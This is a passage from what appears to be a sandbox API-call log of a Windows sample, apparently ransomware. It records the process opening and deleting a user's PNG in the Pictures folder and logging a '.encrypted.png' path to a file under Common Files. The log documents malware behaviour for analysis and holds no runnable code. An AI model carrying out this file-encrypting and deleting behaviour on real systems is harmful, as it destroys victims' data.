lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.489] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0040.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0040.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.489] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0040.489] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.490] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\vyeric.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0040.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0040.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0040.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0040.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0040.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0040.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0040.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0040.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0040.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0040.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0040.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0040.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0040.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0040.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0040.492] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.492] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0040.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0040.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0040.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.492] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0040.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88cce8 [0040.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88cce8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0040.492] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.492] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0040.493] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0040.493] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0040.493] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0040.493] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0040.493] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.493] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.493] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdc0 [0040.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cdc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0040.494] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.494] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.494] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.494] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0040.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0040.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.494] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png", lpFilePart=0x0) returned 0x43 [0040.494] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf77fd840, ftCreationTime.dwHighDateTime=0x1d5bf74, ftLastAccessTime.dwLowDateTime=0x6bebefd0, ftLastAccessTime.dwHighDateTime=0x1d5bcb3, ftLastWriteTime.dwLowDateTime=0x17d87600, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14eb0, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="VyeRic.png", cAlternateFileName="")) returned 0x7c2240 [0040.494] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\vyeric.png")) returned 1 [0040.496] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf77fd840, ftCreationTime.dwHighDateTime=0x1d5bf74, ftLastAccessTime.dwLowDateTime=0x6bebefd0, ftLastAccessTime.dwHighDateTime=0x1d5bcb3, ftLastWriteTime.dwLowDateTime=0x17d87600, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14eb0, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="VyeRic.png", cAlternateFileName="")) returned 0 [0040.496] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.496] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.496] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0040.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0040.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0040.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0040.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.496] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.497] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.497] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.497] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.497] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.497] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0040.497] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.497] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.498] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0040.498] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.498] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.498] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0040.498] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2df7, lpOverlapped=0x0) returned 1 [0040.498] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0040.498] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2df7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.498] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.encrypted.png\r\n", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0040.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0040.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.encrypted.png\r\n", cchWideChar=80, lpMultiByteStr=0x7f3630, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.encrypted.png\r\n", lpUsedDefaultChar=0x0) returned 80 [0040.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0040.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0040.498] WriteFile (in: hFile=0x128, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x4f, lpOverlapped=0x0) returned 1 [0040.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0040.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.499] CloseHandle (hObject=0x128) returned 1 [0040.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0040.503] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: 